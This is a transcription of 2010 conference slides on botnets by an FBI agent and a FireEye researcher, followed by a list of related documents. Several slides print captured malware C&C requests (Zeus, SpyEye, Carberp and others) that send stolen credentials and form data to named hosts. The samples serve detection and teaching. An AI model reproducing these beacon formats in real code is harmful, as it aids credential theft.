Botnets. Sponsored by: ISSA Web Conference. October 26, 2010 Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London

Size: px
Start display at page:

Download "Botnets. Sponsored by: ISSA Web Conference. October 26, 2010 Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London"

Transcription

1 Botnets Sponsored by: ISSA Web Conference October 26, 2010 Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London 1

2 Welcome: Conference Moderator Phillip H Griffin Member - ISSA Educational Advisory Council, Web Conferences Committee 2

3 Agenda How Botnets Have Evolved Chris Calderon - Special Agent, FBI Rooting Out the Bad Actors Alex Lanstein - Systems Consulting Engineer, FireEye Joint Speaker Question & Answer Closing Comments 3

4 UNCLASSIFIED How Botnets Have Evolved presented by Special Agent Chris Calderon FBI UNCLASSIFIED

5 UNCLASSIFIED Agenda What is a botnet? How are botnets created? Why are botnets created? Basic structure of a botnet Taking down a botnet How botnets are evolving Botnets in the news Questions UNCLASSIFIED

6 UNCLASSIFIED What is a botnet? A network of compromised computers (robots/bots) Controlled by a bot master / herder Used to carry out various illegal activities Services are often sold to other criminal elements UNCLASSIFIED

7 UNCLASSIFIED How are botnets created? Setup Obtain reliable infrastructure Develop malware and C&C software Victims Malware loaded onto victim machines Done through exploits and/or social engineering Manage Continually update software / instructions to bots Maintain statistics for the botnet UNCLASSIFIED

8 UNCLASSIFIED Why are botnets created? Spam Distributed Denial of Service (DDoS) Click Fraud Fake Anti-Virus Credential Theft Proxy Service Cyber Warfare UNCLASSIFIED

9 UNCLASSIFIED Basic Structure Bot Master / Herder C&C Server C&C Server Victim Victim Victim UNCLASSIFIED

10 UNCLASSIFIED Taking down a botnet Bot Master / Herder C&C Server C&C Server Victim Victim Victim UNCLASSIFIED

11 UNCLASSIFIED Botnets evolving Bot Master / Herder C&C Server C&C Server Proxy Proxy Proxy Victim Victim Victim Victim UNCLASSIFIED

12 UNCLASSIFIED Botnets evolving Proxy Victim Proxy C&C Server Victim Bot Master / Herder Proxy Victim Proxy C&C Server Proxy Victim UNCLASSIFIED

13 UNCLASSIFIED Botnets in the news ZEUS Steels and logs online banking credentials Primarily targets high balance accounts Money mules used to get money to bad actors Kit now used by many different groups Estimated $70,000,000 stolen from US banks UNCLASSIFIED

14 UNCLASSIFIED Botnets in the news MARIPOSA (BUTTERFLY) Steels online credentials, and also used in DDoS attacks Estimated 12 million infected computers Bad actors traced to Spain and arrested Criminal proceedings ongoing UNCLASSIFIED

15 UNCLASSIFIED Botnets in the news SPAM BOTS Conficker, Cutwail, Waledac,. Up to 10 million bots per botnet Each botnet can send billions of spam s per day Spam used to distribute malware, drive online pharmaceutical sales, fake antivirus software, pay per click advertising,. UNCLASSIFIED

16 UNCLASSIFIED Questions? UNCLASSIFIED

17 Rooting out the Bad Actors or: p2p, fast flux, and other botnet myths Alex Lanstein Senior Security Researcher FireEye, Inc.

18 Today s Agenda 2 Understanding the shift from conventional to modern malware, and the resultant hosting needs A few TT&P to uncover older or moderately sophisticated malware A detailed looked a few bots in the news 18

19 Conventional vs. Modern, APT Malware Conventional Malware Characterized by using spreading techniques, custom C&C transport protocols, IRC communication Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots Detectable through a variety of technologies/tactics: NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS Port scanning, high windows port activity, non-http over port 80, non-web traffic, etc. 3 19

20 Conventional vs. Modern Malware Modern-ish malware: Characterized by infecting via browser based exploits Exploit Channel: PDF, Flash, IE/FireFox, QuickTime, C&C Callback over HTTP(s) Malware: ZeuS, Gozi, Koobface, Rustock, Spyeye Partially detectable through manual traffic analysis fairly easily, but a full time resource is needed 4 20

21 World s Top Malware Source: FireEye Malware Intelligence Lab 21 21

22 Modern Malware Infection Lifecycle 1 System gets exploited 2 Drive-by attacks in casual browsing Links in Targeted s Socially engineered binaries Dropper malware installs Compromised Web server, or Web 2.0 site Callback Server First step to establish control Calls back out to criminal servers Found on compromised sites, and Web 2.0, user-created content sites Perimeter Security Signature, rule-based 3 Malicious data theft & longterm control established Other gateway List-based, signatures Uploads data stolen via keyloggers, Trojans, bots, & file grabbers One exploit leads to dozens of infections on same system Criminals have built long-term control mechanisms into system Desktop antivirus Losing the threat arms race 22 22

23 Where is all this malware being hosted? Previously we used to see malware being hosted on infected home machines Web filters responded by blocking access to domains that had multiple A records in residential IP space Now it s being hosted on dedicated servers in proper data centers. Sometimes even with their own RIR registered IP space! 23

24 Root of the Problem There is no Internet Police! Who controls the Internet? ICANN? IANA? CERTs? USCYBERCOM? Tier 1 ISPs? Depends who you ask and how big a stink you make. 24

25 How the Internet is delegated In the name space (think DNS): ICANN Registries Registries == Verisign, Affilias, cctld operators Registries sell to certified gtld and regional registrars Registrars == namecheap.com, godaddy.com, netsol.com Registrars sell to registrants (end user) 25

26 How the Internet is delegated In the IP space: ICANN/IANA (Internet Assigned Numbers Authority) IANA RIRs RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC RIRs LIRs LIRs are generally data centers and ISPs 26

27 27

28 28

29 29

30 ICANN t do anything! ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the Registrar doesn t violate the contract. These contracts have no mention of content. Recent success against EstDomains was due to them having a convicted felon as an Officer of the company. Large pushback when someone even suspects they are trying to take an authoritative stance on something. 30

31 31

32 32

33 Big bots in 2010

34 34 Rustock still sticking around POST /index.php?topic= HTTP/1.1 Accept: */* Accept-Language: en-us Referer: Content-Type: application/x-www-form-urlencoded Content-Encoding: gzip UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: go-thailand-now.com Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache 18

35 35 Gozi POST /cgi-bin/forms.cgi HTTP/1.0 Content-Type: multipart/form-data; boundary= b9b3139b9b3139b9b3 User-Agent: IE Host: Content-Length: 453 Pragma: no-cache b9b3139b9b3139b9b3 Content-Disposition: form-data; name="upload_file"; filename=" " Content-Type: application/octet-stream URL: FhI &it=1121&sid=6jk1290nr3a3&rid=4611&aid=95&= mousemove b9b3139b9b3139b9b3-- 19

36 36 Zeus POST /xed/gate.php HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;.NET CLR ;.NET CLR ;.NET CLR ; Media Center PC 6.0; HPNTDF) Host: schastlivieiveselierebyta0001.com Content-Length: 329 Connection: Keep-Alive Cache-Control: no-cache a..2.`.ul...t...(...4pp.u.x.!.d.!.+...q.. ' D.0..Y...$...[(...F...c. Ss.Gt'.a....cU./..e(...QB.D.S..N0>.5...I.`:..."...;5..U..t...!...f.=E.<?S..J..J...&.U4...Ju.'9F..E..A.{../.X.cY.}..9..?_...$#>...0Y,....".<. 20

37 37 Tigger Not just financials anymore POST /track_c.cgi HTTP/1.0 Content-Length: 81 icin.wembh.rjr...{.jst]...wsjauqfn.mst^ajs.bj.i_huuy_.j[yq..j.j.....l. SANDBOX_QEZA ;append;20;Microsoft Windows XP Service Pack 3;post_log;16639;force;[[[URL: Title: <untitled> Process: C:\Program Files\Internet Explorer\iexplore.exe User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts;.NET CLR ;.NET CLR ;.NET CLR ;.NET CLR ; InfoPath.2;.NET CLR ;.NET CLR )]]] {{{_b=sandbox&_k=mypass55%23&_r=0&timezone=420&timezonefeb=420&timez oneoct=4 20&clientTime=removed&awr=1&isLoginForm=1&awsnf=_5&awsn=_u&awfid=true &aw charset=utf-8&keylog=s}}} 21

38 38 SpyEye ZeuS replacement? GET /web/map/gate.php?guid=users1!ajklpq!ju1232 &ver=10280&stat=online&plg=ftpbc;socks5;t2p&cpu=0&ccrc=jkl AF24&md5=9012ab902413dcf8gga89 HTTP/1.0 User-Agent: Microsoft Internet Explorer Host: hahsdhsl.com Pragma: no-cache GET /maincp/gate.php?guid=user2!nd93103!893cnd1 &ver=10280&stat=online&cpu=0&ccrc=a91024n&md5=3fabd bdbee HTTP/1.0 User-Agent: Microsoft Internet Explorer Host: Pragma: no-cache 22

39 39 Carberp Yet Another Datastealer POST /recv.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en- US; rv: ) Gecko/ Firefox/ Accept: text/html Connection: Close Content-Type: application/x-www-form-urlencoded Content-Length: 331 uid=mywitch099abe fga91afd&brw=2&type=1 &data=https%3a%2f%2fwww%2estarwoodhotels%2ecom% 2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7 CPOST%3AsuccessPath%3Dhttps%253A%252F%252Fwww %2Estarwoodhotels%2Ecom%252Fpreferredguest%252Finde x%2ehtml%26login%3dalexlanstein%2540gmail%2ec OM%26persist%3Dtrue%26password%3Dmypassword 23

40 40 TDSS Full on SSL 19:11: IP > : tcp *.H.....0E1.0..U...AU1.0...U Some-State1!0...U...Internet Widgits Pty Ltd Z Z0E1.0.U...AU1.0...U Some-State1!0...U...Internet Widgits Pty Ltd

41 Thank you! Alex Lanstein 41 For late-breaking malware research and news: blog.fireeye.com FireEye, Inc. Confidential 41

42 Joint Speaker Question & Answer Chris Calderon Special Agent, FBI Alex Lanstein Systems Consulting Engineer, FireEye 42

43 Closing Remarks Thank you to FireEye for their support of ISSA and this Web Conference Thank you to Citrix for donating this Webcast service 43 Online Meetings Made Easy

44 CPE Credit Within 24 hours of the conclusion of this webcast, you will receive a link to a post Web Conference quiz. After the successful completion of the quiz you will be given an opportunity to PRINT a certificate of attendance to use for the submission of CPE credits. 44

Innovations in Network Security

Innovations in Network Security Innovations in Network Security Michael Singer April 18, 2012 AT&T, the AT&T logo and all other AT&T marks contained herein are trademarks of AT&T Intellectual Property and/or AT&T affiliated companies.

More information

BOTNETS. Douwe Leguit, Manager Knowledge Center GOVCERT.NL

BOTNETS. Douwe Leguit, Manager Knowledge Center GOVCERT.NL BOTNETS Douwe Leguit, Manager Knowledge Center GOVCERT.NL Agenda Bots: what is it What is its habitat How does it spread What are its habits Dutch cases Ongoing developments Visibility of malware vs malicious

More information

Botnets: The Advanced Malware Threat in Kenya's Cyberspace

Botnets: The Advanced Malware Threat in Kenya's Cyberspace Botnets: The Advanced Malware Threat in Kenya's Cyberspace AfricaHackon 28 th February 2014 Who we Are! Paula Musuva-Kigen Research Associate Director, Centre for Informatics Research and Innovation (CIRI)

More information

White Paper Defending Against Advanced Persistent Threats

White Paper Defending Against Advanced Persistent Threats RELEVANT. INTELLIGENT. SECURITY White Paper Defending Against Advanced Persistent Threats www.solutionary.com (866) 333-2133 DEFENDING AGAINST ADVANCED PERSISTENT THREATS January, 2012 Introduction The

More information

Rogue DNS servers a case study

Rogue DNS servers a case study Rogue DNS servers a case study Feike Hacquebord Forward Looking Threat Research, Trend Micro Cupertino, CA, USA feikehayo_hacquebord@trendmicro.com Contents Introduction to DNS DNS Changer Trojans Rogue

More information

Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus. February 3, 2015 (Revision 4)

Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus. February 3, 2015 (Revision 4) Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus February 3, 2015 (Revision 4) Table of Contents Overview... 3 Malware, Botnet Detection, and Anti-Virus Auditing... 3 Malware

More information

Security workshop Protection against botnets. Belnet Aris Adamantiadis Brussels 18 th April 2013

Security workshop Protection against botnets. Belnet Aris Adamantiadis Brussels 18 th April 2013 Security workshop Belnet Aris Adamantiadis Brussels 18 th April 2013 Agenda What is a botnet? Symptoms How does it work? Life cycle How to fight against botnets? Proactive and reactive NIDS 2 What is a

More information

Spear Phishing Attacks Why They are Successful and How to Stop Them

Spear Phishing Attacks Why They are Successful and How to Stop Them White Paper Spear Phishing Attacks Why They are Successful and How to Stop Them Combating the Attack of Choice for Cybercriminals White Paper Contents Executive Summary 3 Introduction: The Rise of Spear

More information

SECURITY REIMAGINED SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM. Why Automated Analysis Tools are not Created Equal

SECURITY REIMAGINED SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM. Why Automated Analysis Tools are not Created Equal WHITE PAPER SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM Why Automated Analysis Tools are not Created Equal SECURITY REIMAGINED CONTENTS Executive Summary...3 Introduction: The Rise

More information

Using TestLogServer for Web Security Troubleshooting

Using TestLogServer for Web Security Troubleshooting Using TestLogServer for Web Security Troubleshooting Topic 50330 TestLogServer Web Security Solutions Version 7.7, Updated 19-Sept- 2013 A command-line utility called TestLogServer is included as part

More information

Group-IB. Stages of Sustainable Solid Development. Acquisition by Leta Group. Creation of CERT-GIB. International Expansion. Group-IB is founded

Group-IB. Stages of Sustainable Solid Development. Acquisition by Leta Group. Creation of CERT-GIB. International Expansion. Group-IB is founded Group-IB Group-IB is founded Acquisition by Leta Group International Expansion Creation of CERT-GIB Dedicated Certified Professionals 60+ employees 2012 2003 2010 2011 2011 Stages of Sustainable Solid

More information

Using Traffic Direction Systems to simplify fraud... and complicate investigations!

Using Traffic Direction Systems to simplify fraud... and complicate investigations! Using Traffic Direction Systems to simplify fraud... and complicate investigations! Maxim Goncharov What is web traffic? User Site Separate Web traffic? Site User Script-in-the-middle Site Site System

More information

Overview. Common Internet Threats. Spear Phishing / Whaling. Phishing Sites. Virus: Pentagon Attack. Viruses & Worms

Overview. Common Internet Threats. Spear Phishing / Whaling. Phishing Sites. Virus: Pentagon Attack. Viruses & Worms Overview Common Internet Threats Tom Chothia Computer Security, Lecture 19 Phishing Sites Trojans, Worms, Viruses, Drive-bydownloads Net Fast Flux Domain Flux Infiltration of a Net Underground economy.

More information

Botnet Analysis Leveraging Domain Ratio Analysis Uncovering malicious activity through statistical analysis of web log traffic

Botnet Analysis Leveraging Domain Ratio Analysis Uncovering malicious activity through statistical analysis of web log traffic The Leader in Cloud Security RESEARCH REPORT Botnet Analysis Leveraging Domain Ratio Analysis Uncovering malicious activity through statistical analysis of web log traffic ABSTRACT Zscaler is a cloud-computing,

More information

Abusing the Internet of Things. BLACKOUTS. FREAKOUTS. AND STAKEOUTS. @nitesh_dhanjani

Abusing the Internet of Things. BLACKOUTS. FREAKOUTS. AND STAKEOUTS. @nitesh_dhanjani 2014 Abusing the Internet of Things. BLACKOUTS. FREAKOUTS. AND STAKEOUTS. @nitesh_dhanjani We are going to depend on IoT devices for our privacy and physical security at work and at home. Vulnerabilities

More information

Spyware. Michael Glenn Technology Management Michael.Glenn@Qwest.com. 2004 Qwest Communications International Inc.

Spyware. Michael Glenn Technology Management Michael.Glenn@Qwest.com. 2004 Qwest Communications International Inc. Spyware Michael Glenn Technology Management Michael.Glenn@Qwest.com Agenda Security Fundamentals Current Issues Spyware Definitions Overlaps of Threats Best Practices What Service Providers are Doing References

More information

TECHNICAL REPORT. An Analysis of Domain Silver, Inc..pl Domains

TECHNICAL REPORT. An Analysis of Domain Silver, Inc..pl Domains TECHNICAL REPORT An Analysis of Domain Silver, Inc..pl Domains July 31, 2013 CONTENTS Contents 1 Introduction 2 2 Registry, registrar and registrant 3 2.1 Rogue registrar..................................

More information

Operation Liberpy : Keyloggers and information theft in Latin America

Operation Liberpy : Keyloggers and information theft in Latin America Operation Liberpy : Keyloggers and information theft in Latin America Diego Pérez Magallanes Malware Analyst Pablo Ramos HEAD of LATAM Research Lab 7/7/2015 version 1.1 Contents Introduction... 3 Operation

More information

05 June 2015 A-000061-MW TLP: GREEN

05 June 2015 A-000061-MW TLP: GREEN 05 June 2015 Alert Number A-000061-MW Please contact the FBI with any questions related to this FLASH Report at either your local Cyber Task Force or FBI CYWATCH. Email: cywatch@ic.fbi.gov Phone: 1-855-292-3937

More information

Combating Web Fraud with Predictive Analytics. Dave Moore Novetta Solutions dmoore@novetta.com

Combating Web Fraud with Predictive Analytics. Dave Moore Novetta Solutions dmoore@novetta.com Combating Web Fraud with Predictive Analytics Dave Moore Novetta Solutions dmoore@novetta.com Novetta Solutions Formerly, International Biometric Group (IBG) Consulting DoD, DHS, DRDC IR&D Identity Cyber

More information

Evolution of attacks and Intrusion Detection

Evolution of attacks and Intrusion Detection Evolution of attacks and Intrusion Detection AFSecurity seminar 11 April 2012 By: Stian Jahr Agenda Introductions What is IDS What is IDS in mnemoic How attacks have changed by time and how has it changed

More information

The FBI Cyber Program. Bauer Advising Symposium //UNCLASSIFIED

The FBI Cyber Program. Bauer Advising Symposium //UNCLASSIFIED The FBI Cyber Program Bauer Advising Symposium October 11, 2012 Today s Agenda What is the threat? Who are the adversaries? How are they attacking you? What can the FBI do to help? What can you do to stop

More information

Information Security Threat Trends

Information Security Threat Trends Talk @ Microsoft Security Day Sep 2005 Information Security Threat Trends Mr. S.C. Leung 梁 兆 昌 Senior Consultant 高 級 顧 問 CISSP CISA CBCP M@PISA Email: scleung@hkcert.org 香 港 電 腦 保 安 事 故 協 調 中 心 Introducing

More information

Networks and the Internet A Primer for Prosecutors and Investigators

Networks and the Internet A Primer for Prosecutors and Investigators Computer Crime & Intellectual Property Section Networks and the Internet A Primer for Prosecutors and Investigators Michael J. Stawasz Senior Counsel Computer Crime and Intellectual Property Section ()

More information

VISA SECURITY ALERT December 2015 KUHOOK POINT OF SALE MALWARE. Summary. Distribution and Installation

VISA SECURITY ALERT December 2015 KUHOOK POINT OF SALE MALWARE. Summary. Distribution and Installation VISA SECURITY ALERT December 2015 KUHOOK POINT OF SALE MALWARE Distribution: Merchants, Acquirers Who should read this: Information security, incident response, cyber intelligence staff Summary Kuhook

More information

reference: HTTP: The Definitive Guide by David Gourley and Brian Totty (O Reilly, 2002)

reference: HTTP: The Definitive Guide by David Gourley and Brian Totty (O Reilly, 2002) 1 cse879-03 2010-03-29 17:23 Kyung-Goo Doh Chapter 3. Web Application Technologies reference: HTTP: The Definitive Guide by David Gourley and Brian Totty (O Reilly, 2002) 1. The HTTP Protocol. HTTP = HyperText

More information

SECURITY REIMAGINED HACKING THE STREET? FIN4 LIKELY PLAYING THE MARKET SPECIAL REPORT

SECURITY REIMAGINED HACKING THE STREET? FIN4 LIKELY PLAYING THE MARKET SPECIAL REPORT SPECIAL REPORT HACKING THE STREET? FIN4 LIKELY PLAYING THE MARKET WRITTEN BY: BARRY VENGERIK KRISTEN DENNESEN JORDAN BERRY JONATHAN WROLSTAD SECURITY REIMAGINED CONTENTS KEY FINDINGS...3 APPLYING WALL

More information

Malicious Network Traffic Analysis

Malicious Network Traffic Analysis Malicious Network Traffic Analysis Uncover system intrusions by identifying malicious network activity. There are a tremendous amount of network based attacks to be aware of on the internet today and the

More information

TRAFFIC DIRECTION SYSTEMS AS MALWARE DISTRIBUTION TOOLS

TRAFFIC DIRECTION SYSTEMS AS MALWARE DISTRIBUTION TOOLS TRAFFIC DIRECTION SYSTEMS AS MALWARE DISTRIBUTION TOOLS g Maxim Goncharov A 2011 Trend Micro Research Paper Abstract Directing traffic to cash in on referrals is a common and legitimate method of making

More information

Networking for Caribbean Development

Networking for Caribbean Development Networking for Caribbean Development BELIZE NOV 2 NOV 6, 2015 w w w. c a r i b n o g. o r g N E T W O R K I N G F O R C A R I B B E A N D E V E L O P M E N T BELIZE NOV 2 NOV 6, 2015 w w w. c a r i b n

More information

Acunetix Website Audit. 5 November, 2014. Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build 20120808)

Acunetix Website Audit. 5 November, 2014. Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build 20120808) Acunetix Website Audit 5 November, 2014 Developer Report Generated by Acunetix WVS Reporter (v8.0 Build 20120808) Scan of http://filesbi.go.id:80/ Scan details Scan information Starttime 05/11/2014 14:44:06

More information

The author(s) shown below used Federal funds provided by the U.S. Department of Justice and prepared the following final report:

The author(s) shown below used Federal funds provided by the U.S. Department of Justice and prepared the following final report: The author(s) shown below used Federal funds provided by the U.S. Department of Justice and prepared the following final report: Document Title: Author: Examining the Creation, Distribution, and Function

More information

Why The Security You Bought Yesterday, Won t Save You Today

Why The Security You Bought Yesterday, Won t Save You Today 9th Annual Courts and Local Government Technology Conference Why The Security You Bought Yesterday, Won t Save You Today Ian Robertson Director of Information Security Michael Gough Sr. Risk Analyst About

More information

DNS Firewall Overview Speaker Name. Date

DNS Firewall Overview Speaker Name. Date DNS Firewall Overview Speaker Name 1 1 Date Reserved. Agenda DNS Security Challenges DNS Firewall Solution Customers Call to Action 2 2 Reserved. APTs: The New Threat Landscape Nation-state or organized-crime

More information

Indian Computer Emergency Response Team (CERT-In) Annual Report (2010)

Indian Computer Emergency Response Team (CERT-In) Annual Report (2010) Indian Computer Emergency Response Team (CERT-In) Annual Report (2010) Indian Computer Emergency Response Team (CERT-In) Department of Information Technology Ministry of Communications & Information Technology

More information

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP

More information

Exploring the Black Hole Exploit Kit

Exploring the Black Hole Exploit Kit Exploring the Black Hole Exploit Kit Updated December 20, 2011 Internet Identity Threat Intelligence Department http://www.internetidentity.com http://www.internetidentity.com 12/29/11 Page 1/20 Summary

More information

Description: Course Details:

Description: Course Details: Course: Malicious Network Traffic Analysis Duration: 5 Day Hands-On Lab & Lecture Course Price: $ 3,495.00 Description: There are a tremendous amount of network based attacks to be aware of on the internet

More information

The Federal CISO Dilemma. You have to do FISMA. You must defend against cyber threats.

The Federal CISO Dilemma. You have to do FISMA. You must defend against cyber threats. The Federal CISO Dilemma You have to do FISMA. You must defend against cyber threats. October 2012 Executive Summary Federal CISOs face a unique cyber security challenge copious amounts of regulatory compliance

More information

Internet Banking Attacks. Karel Miko, CISA DCIT, a.s. (Prague, Czech Republic) miko@dcit.cz

Internet Banking Attacks. Karel Miko, CISA DCIT, a.s. (Prague, Czech Republic) miko@dcit.cz Internet Banking Attacks Karel Miko, CISA DCIT, a.s. (Prague, Czech Republic) miko@dcit.cz Contents Agenda Internet banking today The most common attack vectors The possible countermeasures What protection

More information

Spike DDoS Toolkit OVERVIEW INDICATORS OF BINARY INFECTION. TLP: GREEN GSI ID: 1078 Risk Factor - High

Spike DDoS Toolkit OVERVIEW INDICATORS OF BINARY INFECTION. TLP: GREEN GSI ID: 1078 Risk Factor - High Spike DDoS Toolkit TLP: GREEN GSI ID: 1078 Risk Factor - High OVERVIEW In 2014, PLXsert has observed a trend in new distributed denial of service (DDoS) malware originating from Asia. These binaries have

More information

Malware B-Z: Inside the Threat From Blackhole to ZeroAccess

Malware B-Z: Inside the Threat From Blackhole to ZeroAccess Malware B-Z: Inside the Threat From Blackhole to ZeroAccess By Richard Wang, Manager, SophosLabs U.S. Over the last few years the volume of malware has grown dramatically, thanks mostly to automation and

More information

white paper Malware Security and the Bottom Line

white paper Malware Security and the Bottom Line Malware Security Report: Protecting Your BusineSS, Customers, and the Bottom Line Contents 1 Malware is crawling onto web sites everywhere 1 What is Malware? 2 The anatomy of Malware attacks 3 The Malware

More information

Current Counter-measures and Responses by the Domain Name System Community

Current Counter-measures and Responses by the Domain Name System Community Current Counter-measures and Responses by the Domain Name System Community Paul Twomey President and CEO 22 April 2007 APEC-OECD Malware Workshop Manila, The Philippines 1 What I want to do today in 15

More information

Using big data analytics to identify malicious content: a case study on spam emails

Using big data analytics to identify malicious content: a case study on spam emails Using big data analytics to identify malicious content: a case study on spam emails Mamoun Alazab & Roderic Broadhurst Mamoun.alazab@anu.edu.au http://cybercrime.anu.edu.au 2 Outline Background Cybercrime

More information

Web Application Worms & Browser Insecurity

Web Application Worms & Browser Insecurity Web Application Worms & Browser Insecurity Mike Shema Welcome Background Hacking Exposed: Web Applications The Anti-Hacker Toolkit Hack Notes: Web Security Currently working at Qualys

More information

Alert (TA14-212A) Backoff Point-of-Sale Malware

Alert (TA14-212A) Backoff Point-of-Sale Malware Alert (TA14-212A) Backoff Point-of-Sale Malware Original release date: July 31, 2014 Systems Affected Point-of-Sale Systems Overview This advisory was prepared in collaboration with the National Cybersecurity

More information

Fast Flux Hosting and DNS ICANN SSAC

Fast Flux Hosting and DNS ICANN SSAC Fast Flux Hosting and DNS ICANN SSAC What is Fast Flux Hosting? An evasion technique Goal Avoid detection and take down of web sites used for illegal purposes Technique Host illegal content at many sites

More information

Security Incidents And Trends In Croatia. Domagoj Klasić dklasic@cert.hr

Security Incidents And Trends In Croatia. Domagoj Klasić dklasic@cert.hr Security Incidents And Trends In Croatia Domagoj Klasić dklasic@cert.hr Croatian National CERT About us Founded in 2008. in accordance with the Information Security Act We are a department of the Croatian

More information

The Benefits of SSL Content Inspection ABSTRACT

The Benefits of SSL Content Inspection ABSTRACT The Benefits of SSL Content Inspection ABSTRACT SSL encryption is the de-facto encryption technology for delivering secure Web browsing and the benefits it provides is driving the levels of SSL traffic

More information

Law Enforcement and Internet Governance: An Ounce of Prevention Is Worth a Pound of Cure

Law Enforcement and Internet Governance: An Ounce of Prevention Is Worth a Pound of Cure Law Enforcement and Internet Governance: An Ounce of Prevention Is Worth a Pound of Cure Supervisory Special Agent Robert Flaim Federal Bureau of Investigation (FBI) Operational Technology Division Global

More information

CYBERSECURITY INESTIGATION AND ANALYSIS

CYBERSECURITY INESTIGATION AND ANALYSIS CYBERSECURITY INESTIGATION AND ANALYSIS The New Crime of the Digital Age The Internet is not just the hotspot of all things digital and technical. Because of the conveniences of the Internet and its accessibility,

More information

CSE 3482 Introduction to Computer Security. Denial of Service (DoS) Attacks

CSE 3482 Introduction to Computer Security. Denial of Service (DoS) Attacks CSE 3482 Introduction to Computer Security Denial of Service (DoS) Attacks Instructor: N. Vlajic, Winter 2015 Learning Objectives Upon completion of this material, you should be able to: Explain the basic

More information

QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY

QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY EXPLOIT KITS UP 75 PERCENT The Infoblox DNS Threat Index, powered by IID, stood at 122 in the third quarter of 2015, with exploit kits up 75 percent

More information

Internet Structure and Organization

Internet Structure and Organization Internet Structure and Organization Resources management and allocation Bernard.Tuy@renater.fr Introduction What s the Internet? Why organizations / bodies are needed? Define protocol specifications Agree

More information

Cyber Security Workshop Ethical Web Hacking

Cyber Security Workshop Ethical Web Hacking Cyber Security Workshop Ethical Web Hacking May 2015 Setting up WebGoat and Burp Suite Hacking Challenges in WebGoat Concepts in Web Technologies and Ethical Hacking 1 P a g e Downloading WebGoat and Burp

More information

Cybercrime myths, challenges and how to protect our business. Vladimir Kantchev Managing Partner Service Centrix

Cybercrime myths, challenges and how to protect our business. Vladimir Kantchev Managing Partner Service Centrix Cybercrime myths, challenges and how to protect our business Vladimir Kantchev Managing Partner Service Centrix Agenda Cybercrime today Sources and destinations of the attacks Breach techniques How to

More information

Malware, Phishing, and Cybercrime Dangerous Threats Facing the SMB State of Cybercrime

Malware, Phishing, and Cybercrime Dangerous Threats Facing the SMB State of Cybercrime How to Protect Your Business from Malware, Phishing, and Cybercrime The SMB Security Series Malware, Phishing, and Cybercrime Dangerous Threats Facing the SMB State of Cybercrime sponsored by Introduction

More information

Unknown threats in Sweden. Study publication August 27, 2014

Unknown threats in Sweden. Study publication August 27, 2014 Unknown threats in Sweden Study publication August 27, 2014 Executive summary To many international organisations today, cyber attacks are no longer a matter of if but when. Recent cyber breaches at large

More information

BotNets- Cyber Torrirism

BotNets- Cyber Torrirism BotNets- Cyber Torrirism Battling the threats of internet Assoc. Prof. Dr. Sureswaran Ramadass National Advanced IPv6 Center - Director Why Talk About Botnets? Because Bot Statistics Suggest Assimilation

More information

Advancements in Botnet Attacks and Malware Distribution

Advancements in Botnet Attacks and Malware Distribution Advancements in Botnet Attacks and Malware Distribution HOPE Conference, New York, July 2012 Aditya K Sood Rohit Bansal Richard J Enbody SecNiche Security Department of Computer Science and Engineering

More information

Managing Web Security in an Increasingly Challenging Threat Landscape

Managing Web Security in an Increasingly Challenging Threat Landscape Managing Web Security in an Increasingly Challenging Threat Landscape Cybercriminals have increasingly turned their attention to the web, which has become by far the predominant area of attack. Small wonder.

More information

Security Challenges and Solutions for Higher Education. May 2011

Security Challenges and Solutions for Higher Education. May 2011 Security Challenges and Solutions for Higher Education May 2011 Discussion Topics Security Threats and Challenges Education Risks and Trends ACH and Wire Fraud Malware and Phishing Techniques Prevention

More information

FSOEP Web Banking & Fraud: Corporate Treasury Attacks

FSOEP Web Banking & Fraud: Corporate Treasury Attacks FSOEP Web Banking & Fraud: Corporate Treasury Attacks Your Presenters Who Are We? Tim Wainwright Managing Director Chris Salerno Senior Consultant Led 200+ penetration tests Mobile security specialist

More information

FAQ (Frequently Asked Questions)

FAQ (Frequently Asked Questions) FAQ (Frequently Asked Questions) Specific Questions about Afilias Managed DNS What is the Afilias DNS network? How long has Afilias been working within the DNS market? What are the names of the Afilias

More information

A TASTE OF HTTP BOTNETS

A TASTE OF HTTP BOTNETS Botnets come in many flavors. As one might expect, these flavors all taste different. A lot of Internet users have had their taste of IRC, P2P and HTTP based botnets as their computers were infected with

More information

Current Threat Scenario and Recent Attack Trends

Current Threat Scenario and Recent Attack Trends Current Threat Scenario and Recent Attack Trends Anil Sagar Additional Director Indian Computer Emergency Response Team (CERT-In) Objectives Current Cyber space Nature of cyberspace and associated risks

More information

Security A to Z the most important terms

